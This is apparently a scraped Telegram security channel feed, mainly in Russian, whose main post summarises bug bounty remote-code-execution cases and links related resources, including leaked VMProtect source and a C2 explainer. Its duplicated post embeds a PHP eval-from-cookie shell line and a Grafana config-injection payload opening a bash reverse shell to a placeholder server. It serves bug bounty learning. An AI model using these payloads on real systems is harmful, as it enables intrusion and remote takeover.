Remote Code Execution | Command Injection
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce
RCE сложная и проворная уязвимость, которую хер так просто найдешь при багбаунти или АпСеке. Попался на глаза вот такой ролик, где чувак рассказывает про случаи инъекций команд, в каких местах они вызываются и как находятся. Я решил просто расписать коротко каждый случай из видео с прикрепленным к нему статьей/РоС-ом, чтобы не долбаться каждый раз и не пересматривать видос.
1. Сложная RCE через миграцию GitLab репозиториев с одного инстанса на другой. РоС.
2. /.git/config раскрывает ключ, который можно использовать для выполнения команд на сервере. Статья.
3. Выполнение команд прямо через куки на сервере с PHP (Статья):
{$_COOKIE['c'] .= ';';eval($_COOKIE['c']);exit;}4. Сервер на Руби при фаззинге параметров выдает ошибку через Rack и палит секрет для подписи куки. С помощью этого секрета создаем свой сериализованный объект с РЦЕ внутри. Статья.
5. RCE через CSRF на ажур, с интересным обходом проверки Origin (Статья):
https://<my-webapp>.scm.azurewebsites.net._.<attacker-site>./6. Классическая SSTI на uber через имя профиля с отрабатыванием кода в письме. PoC.
7. RCE через SQL инъекцию. PoC.
8. Dependency Confusion. Об этом типе атак я делал пост ранее.
9. 0day уязвимости: Secure VPN.
10. RCE через картинки: ExifTool.
11. RCE через инъекцию опций в git.
12. Инъекция в параметр СМТП сервера на Grafana. РоС.
"password": "x\r\n[plugin.grafana-image-renderer]\r\nrendering_args=--renderer-cmd-prefix=bash -c bash$IFS-l$IFS>$IFS/dev/tcp/SERVER_IP/4444$IFS0<&1$IFS2>&1"
13. Классический RCE через SSRF через Gopher. Статья.14 Потенциальная RCE через генерацию PDF файлов с использованием headless Chromium. Репорт.
#rce
osnovy_veb-xakinga_bolee_30_primerov_u_Wjqaoge.pdf
6.1 MB
Основы веб-хакинга. Более 30 примеров уязвимостей
СyberChef – приложение для шифрования, кодирования, сжатия и анализа данных
Этот инструмент позволяет как техническим, так и нетехническим аналитикам манипулировать данными, не используя сложные инструменты или алгоритмы
⤷ Ссылка на проект
GitHub | #Interesting #Security #Useful
Этот инструмент позволяет как техническим, так и нетехническим аналитикам манипулировать данными, не используя сложные инструменты или алгоритмы
⤷ Ссылка на проект
GitHub | #Interesting #Security #Useful
Nuclei Templates Monthly - November 2023 Edition
https://blog.projectdiscovery.io/nuclei-templates-monthly-november-2023-edition/
https://blog.projectdiscovery.io/nuclei-templates-monthly-november-2023-edition/
ProjectDiscovery Blog
Nuclei Templates Monthly - November 2023 Edition
Summary of Releases v9.6.9 and v9.7.0
🎉 124 new Templates added
🚀 14 first-time contributions
🔥 31 new CVEs added
Introduction
This month, we've seen several high-profile CVEs impacting various technologies. Key among them is CVE-2023-46604, a significant…
🎉 124 new Templates added
🚀 14 first-time contributions
🔥 31 new CVEs added
Introduction
This month, we've seen several high-profile CVEs impacting various technologies. Key among them is CVE-2023-46604, a significant…
#WebApp_Security
Autonomous Hacking of PHP Web Applications at the Bytecode Level
https://finixbit.github.io/posts/autonomous-Hacking-of-PHP-Web-Applications-at-the-Bytecode-Level
Autonomous Hacking of PHP Web Applications at the Bytecode Level
https://finixbit.github.io/posts/autonomous-Hacking-of-PHP-Web-Applications-at-the-Bytecode-Level
finixbit.github.io
Finixbit - site/blog
🐞 Поисковик по Bug Bounty райтапам. Ресурс включает в себя около 2.5к ссылок на отчеты.
📎 https://www.bugbountyhunting.com/
#BB
📎 https://www.bugbountyhunting.com/
#BB
Bugbountyhunting
BugBountyHunting.com - A community-curated Resource for Bug Bounty Hunting
BugBountyHunting.com collects writeups, resources and content related to bug bounty hunting to help you access them quickly.
It's goal is to help beginners starting in web application security to learn more about bug bounty hunting.
It's goal is to help beginners starting in web application security to learn more about bug bounty hunting.
Media is too big
VIEW IN TELEGRAM
The Best Guide to Entry Level Cyber Security Jobs - The Roadmap to InfoSec
vmp-3.5.1.zip
20.2 MB
VMProtect Source Code (Leaked 07.12.2023)
https://github.com/jmpoep/vmprotect-3.5.1
#tools #source #leaked #vmp #protector
https://github.com/jmpoep/vmprotect-3.5.1
#tools #source #leaked #vmp #protector
Media is too big
VIEW IN TELEGRAM
Выбор дистрибутива Linux для дома
В этом ролике автор подробно разбирает, что выбрать из дистрибутивов, какой рабочий стол Linux подойдет лучше всего и где и как применять различные дистрибутивы GNU/Linux для решения тех или иных задач.
00:00 Вступление
04:38 Fedora
09:26 Debian
13:12 Mint LMDE
15:45 Arch
18:19 Итоги
Смотреть это видео на youtube: youtu.be/fRBXtQDhDh4
В этом ролике автор подробно разбирает, что выбрать из дистрибутивов, какой рабочий стол Linux подойдет лучше всего и где и как применять различные дистрибутивы GNU/Linux для решения тех или иных задач.
00:00 Вступление
04:38 Fedora
09:26 Debian
13:12 Mint LMDE
15:45 Arch
18:19 Итоги
Смотреть это видео на youtube: youtu.be/fRBXtQDhDh4
Forwarded from Cyber Pub
C2 - Command and Control
Hacker lar dastlabki hujumdan keyin buzilgan qurilmalar bilan ma'lumotlarni almashish (boshqarish) uchun ishlatiladi usullar to'plamiga aytiladi.
C2 hujumga uchragan tashkilotdagi qurilmalar va Hacker tomonidan boshqariladigan server o'rtasidagi bir yoki bir nechta yashirin aloqa kanallarini taminlashni o'z ichiga oladi. Ushbu aloqa kanallari buzilgan qurilmalarga ko'rsatmalarni uzatish, qo'shimcha zararli dasturlarni yuklash va ma'lumotlarni o'g'irlash uchun hackerning serveriga yuboradi.
➡️ C2 Matrix
#c2 |😈 Cyber Pub
Hacker lar dastlabki hujumdan keyin buzilgan qurilmalar bilan ma'lumotlarni almashish (boshqarish) uchun ishlatiladi usullar to'plamiga aytiladi.
C2 hujumga uchragan tashkilotdagi qurilmalar va Hacker tomonidan boshqariladigan server o'rtasidagi bir yoki bir nechta yashirin aloqa kanallarini taminlashni o'z ichiga oladi. Ushbu aloqa kanallari buzilgan qurilmalarga ko'rsatmalarni uzatish, qo'shimcha zararli dasturlarni yuklash va ma'lumotlarni o'g'irlash uchun hackerning serveriga yuboradi.
#c2 |
Please open Telegram to view this post
VIEW IN TELEGRAM